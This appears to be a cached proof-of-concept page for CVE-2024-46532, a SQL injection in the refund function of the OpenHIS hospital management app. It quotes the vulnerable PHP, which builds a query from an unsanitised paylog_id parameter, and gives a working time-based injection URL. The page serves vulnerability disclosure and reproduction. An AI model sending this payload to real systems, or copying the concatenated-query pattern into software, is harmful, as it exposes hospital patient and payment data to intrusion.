CVE-2024-46532 PoC — OpenHIS 安全漏洞

Source

https://github.com/KamenRiderDarker/CVE-2024-46532

Associated Vulnerability

Title:OpenHIS 安全漏洞 (CVE-2024-46532)
Description:OpenHIS是中国新致（OpenHIS）公司的一个基于 web 的医院管理应用程序。 OpenHIS v.1.0版本存在安全漏洞，该漏洞源于PayController.class.php组件中的退款功能包含一个SQL注入漏洞。

Description

Reproduction of SQL Injection Vulnerabilities in OpenHIS

Readme

# CVE-2024-46532
Reproduction of SQL Injection Vulnerabilities in OpenHIS

Vulnerabilities：OpenHIS-master/Application/His/Controller/PayController.class.php

SourceLink：https://github.com/1638824607/OpenHIS?tab=readme-ov-file

Vulnerability code：
    public function refund()
    {
        $paylog_id = I('get.paylog_id',0);
    
        $amount = I('post.amount','all');//all就是是全部
        $adm_uid = I('post.adm_uid',0);//all就是是全部
        $adm_memo = I('post.adm_memo','退款');//all就是是全部
    
        if(!$paylog_id||!$amount)$this->resJSON(1,'参数缺失:paylog_id or amount');
    
        #todo 这里需要添加功能权限，无权限不能使用
    
        $sql = "SELECT a.*,b.hospital_id,b.type_id,b.order_code,b.ol_pay_part,b.amount,b.patient_id FROM ".$this->tab_pre."his_care_paylog a LEFT JOIN ".$this->tab_pre."his_care_pkg b ON a.pkg_id=b.id WHERE a.id='$paylog_id' LIMIT 1";
    
        $r = $this->db->query($sql);
        if(!$r)$this->resJSON(2,'paylog_id无效',$sql);

POC:
  /index.php/pay/refund?paylog_id=aaaa'+or+sleep(.6)+--+

File Snapshot


 [4.0K]  /data/pocs/575bbfabe718781d61df46e0c9f3f423151f5ee3
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!